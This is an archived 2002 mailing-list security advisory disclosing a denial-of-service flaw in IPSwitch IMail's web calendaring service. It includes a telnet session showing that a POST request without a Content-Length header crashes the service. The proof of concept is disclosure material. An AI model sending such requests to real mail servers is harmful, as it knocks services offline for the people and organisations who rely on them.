IPSwitch IMail Advisory #2

From: 2c79cbe14ac7d0b8472d3f129fa1df55at_private
Date: Tue Jul 30 2002 - 08:28:37 PDT

  • Next message: infoat_private: "Vulnerability: protected Adobe eBooks can be copied between computers"

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1
    
    2c79cbe14ac7d0b8472d3f129fa1df55 Security Advisory #6
    
    #PRODUCT
    
    IPSwitch IMail, All Current Versions
    
    #VULNERABILITY
    
    the IMail Web Calendaring service, iwebcal, can be crashed by issuing a malformed POST request.. specifically one that neglects to include a "Content-Length:" parameter
    
    xxx@xx:~$ telnet 192.168.0.2 8484
    Trying 192.168.0.2...
    Connected to 192.168.0.2.
    Escape character is '^]'.
    POST / HTTP/1.0
    
    Connection closed by foreign host.
    
    [the iwebcal service has crashed]
    
    xxx@xx:~$ telnet 192.168.0.2 8484
    Trying 192.168.0.2...
    telnet: connect to address 192.168.0.2: Connection refused
    
    #EXPLOITATION
    
    this is pretty obvious, it's a simple DoS.. and it looks as if remote code execution is not possible due to the nature of this programming error
    
    #PATCH
    
    sorry, no backdoors this time.. disable the service before someone else does? or wait for a vendor patch after a few hoaxes are debunked..
    
    #EOF
    
    I think having a hotmail account closed in under 2 hours is some kind of record, especially if you consider I didn't do anything.. so if you sent anything to hotmail, it's likely I didn't get it..
    
    
    oh and no, this isn't one of the 2 remaining,
    2c79cbe14ac7d0b8472d3f129fa1df55at_private
    -----BEGIN PGP SIGNATURE-----
    Version: Hush 2.1
    Note: This signature can be verified at https://www.hushtools.com
    
    wnEEARECADEFAj1GryIqHDJjNzljYmUxNGFjN2QwYjg0NzJkM2YxMjlmYTFkZjU1QGh1
    c2guY29tAAoJEDDErl0ks36NYNEAn1G01zA2hwHdYvyumCfHOcsxA7NaAKCMka4ff/Ho
    fpiGbGqkVc7Fk8uU3A==
    =x/Fs
    -----END PGP SIGNATURE-----
    
    
    Communicate in total privacy.
    Get your free encrypted email at https://www.hushmail.com/?l=2
    
    Looking for a good deal on a domain name? http://www.hush.com/partners/offers.cgi?id=domainpeople
    



    This archive was generated by hypermail 2b30 : Tue Jul 30 2002 - 13:49:50 PDT